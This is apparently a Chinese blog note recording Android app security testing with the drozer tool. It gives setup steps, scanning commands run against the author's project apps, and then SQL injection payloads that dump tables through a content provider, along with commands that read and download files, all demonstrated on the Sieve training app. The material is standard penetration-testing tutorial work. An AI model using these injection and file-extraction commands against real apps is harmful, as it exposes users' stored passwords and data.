0%

安卓安全测试----《二》drozer漏洞扫描

继之前的安全测试学习,对于现有的项目做了部分角度的安全测试。做个记录。

《二》drozer漏洞扫描

工具:drozer
步骤:
    准备:
    1.运行drozer-agent.apk
    2.选择embedded--enable 
    3.设置端口转发:adb forward tcp:31415 tcp:31415

运行:
    1.连接drozer:
    drozer.bat console connect

    2.列出详细APP信息:
    run app.package.info -a com.micen.salesassistant

    3.查看APP的配置信息
    run app.package.manifest com.micen.buyers.activity

    3.分析是否存在攻击攻击点
    run app.package.attacksurface com.micen.buyers.activity

    4.查看暴露的provider权限
    run app.provider.info -a com.micen.buyers.activity

    5.获取Activity信息
    命令     run app.activity.info -a <package name>
    示例     run app.activity.info -a com.micen.buyers.activity

    6.检测SQL注入
    命令     run scanner.provider.injection -a <package name>
    示例     run scanner.provider.injection -a com.micen.buyers.activity

    7.检测目录遍历
    命令     run scanner.provider.traversal -a <package name>
    示例     run scanner.provider.traversal -a com.micen.buyers.activity

    8.获取所有可访问的Uri
    命令     run scanner.provider.finduris -a <package name>
    示例     run scanner.provider.finduris -a com.micen.buyers.activity

    9.SQL注入
    命令     run app.provider.query <uri> [--projection] [--selection]
    示例     run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/

    列出所有表     run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--" 
    获取单表(如Key)的数据     run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"

    10.读取文件系统下的文件
    示例     run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts

    11.下载数据库文件到本地
    示例     run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db d:/database.db